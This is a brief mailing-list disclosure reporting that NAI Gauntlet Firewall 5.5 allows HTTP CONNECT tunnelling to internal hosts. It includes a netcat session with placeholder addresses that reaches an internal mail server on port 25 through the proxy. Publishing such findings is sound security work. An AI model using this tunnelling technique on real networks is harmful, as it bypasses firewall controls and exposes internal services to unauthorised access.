Hi all,
I found some vulnerabilities on the NAI Gauntlet Firewall 5.5 on NT
4. These vulnerabilities were found in other firewalls, specifically
proxy firewalls, and I tried them on the Gauntlet, it worked.
I don't know if this was published earlier or not, but here it goes:
Vulnerability:
- Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id
4131)
Examples: (I'm using Volker Tanger [volker.tanger@discon.de]'s email:
"CheckPoint FW1 HTTP Security Hole" example as a template for my
example)
Client = x.x.x.x
Gauntlet = y.y.y.y
Internal Mailserver = z.z.z.z
nc -v -n y.y.y.y 80
(UNKNOWN) [y.y.y.y] 80 (?) open
CONNECT z.z.z.z:25 HTTP/1.0
HTTP/1.0 200 OK
mail server banner
That's it!
Rashed Alabbar
Engineer\ Security Management and Operations
Security Operations Center
Data Fort - Total Security Solutions
Dubai Internet City
P.O. Box: 500006, Dubai, United Arab Emirates
Email: rashed.alabbar@datafort.net
http://www.datafort.net
_______________________________________________
The preceding E-mail message contains information that is confidential,
may be protected by the attorney-client or other applicable privileges,
and may constitute non-public information, which is intended to be
conveyed only to the designated recipients (s). If you are not an
intended recipient of this message, please notify the sender at (+9714)
391 3040 or via same e-mail. Unauthorized use, dissemination,
distribution, or reproduction of this message is strictly prohibited and
may be unlawful. Internet communications cannot be guaranteed to be
secured or error-free as information could be intercepted, corrupted,
lost, arrive late or contain viruses. The sender therefore does not
accept liability for any errors or omissions in the context of this
message which arise as a result of Internet transmission.
